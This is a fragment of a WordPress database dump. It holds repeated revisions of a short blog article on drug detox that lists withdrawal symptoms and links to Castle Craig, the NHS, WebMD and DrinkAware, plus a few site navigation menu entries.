href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','Everything you need to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-19 15:40:12','2021-08-19 15:40:12','',660,'https://www.westonspirit.org.uk/?p=662',0,'revision','',0),(663,1,'2021-08-19 15:40:23','2021-08-19 15:40:23','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of drugs and/or alcohol from someone\'s system. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p></p><p><iframe width=\"560\" height=\"315\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></p>\n<p></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noreferrer noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','Everything you need to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-19 15:40:23','2021-08-19 15:40:23','',660,'https://www.westonspirit.org.uk/?p=663',0,'revision','',0),(664,1,'2021-08-19 15:40:46','2021-08-19 15:40:46','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of drugs and/or alcohol from someone\'s system. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p></p>\n<p><iframe width=\"560\" height=\"315\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></p>\n<p></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noreferrer noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','Everything you need to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-19 15:40:46','2021-08-19 15:40:46','',660,'https://www.westonspirit.org.uk/?p=664',0,'revision','',0),(665,1,'2021-08-19 15:41:21','2021-08-19 15:41:21','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of drugs and/or alcohol from someone\'s system. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a <strong>medical detox, </strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noreferrer noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','Everything you need to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-19 15:41:21','2021-08-19 15:41:21','',660,'https://www.westonspirit.org.uk/?p=665',0,'revision','',0),(668,1,'2021-08-19 15:50:14','2021-08-19 15:44:20','','Home','','publish','closed','closed','','home','','','2021-08-19 15:50:14','2021-08-19 15:50:14','',0,'https://www.westonspirit.org.uk/?p=668',1,'nav_menu_item','',0),(669,1,'2021-09-08 13:27:58','2021-08-19 15:44:20',' ','','','publish','closed','closed','','669','','','2021-09-08 13:27:58','2021-09-08 13:27:58','',0,'https://www.westonspirit.org.uk/?p=669',9,'nav_menu_item','',0),(670,1,'2021-09-08 13:27:58','2021-08-19 15:44:21','','Dental','','publish','closed','closed','','670','','','2021-09-08 13:27:58','2021-09-08 13:27:58','',0,'https://www.westonspirit.org.uk/?p=670',6,'nav_menu_item','',0),(673,1,'2021-08-19 15:44:36','2021-08-19 15:44:36','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of drugs and/or alcohol from someone\'s system. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a <strong>medical detox, </strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noreferrer noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','The key things to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-19 15:44:36','2021-08-19 15:44:36','',660,'https://www.westonspirit.org.uk/?p=673',0,'revision','',0),(674,1,'2021-08-19 15:44:55','2021-08-19 15:44:55','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of drugs and/or alcohol from someone\'s system. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noreferrer noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','The key things to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-19 15:44:55','2021-08-19 15:44:55','',660,'https://www.westonspirit.org.uk/?p=674',0,'revision','',0),(675,1,'2021-08-19 15:50:14','2021-08-19 15:46:26','','Addiction','','publish','closed','closed','','addiction','','','2021-08-19 15:50:14','2021-08-19 15:50:14','',0,'https://www.westonspirit.org.uk/?p=675',2,'nav_menu_item','',0),(676,1,'2021-09-08 13:27:58','2021-08-19 15:46:26','','Property Development','','publish','closed','closed','','property-development','','','2021-09-08 13:27:58','2021-09-08 13:27:58','',0,'https://www.westonspirit.org.uk/?p=676',4,'nav_menu_item','',0),(679,1,'2021-08-20 10:55:21','2021-08-20 10:55:21','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of drugs and/or alcohol from someone\'s system. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','The key things to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-20 10:55:21','2021-08-20 10:55:21','',660,'https://www.westonspirit.org.uk/?p=679',0,'revision','',0),(681,1,'2021-08-20 11:47:51','2021-08-20 11:47:51','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of drugs and/or alcohol from someone\'s system. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Having a detox to get specific toxins out of your body provides multiple benefits to you:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Improves your mental health</li><li>Removes all of the toxins out of your body</li><li>Provides you with the right headspace so you can focus on sobriety</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- 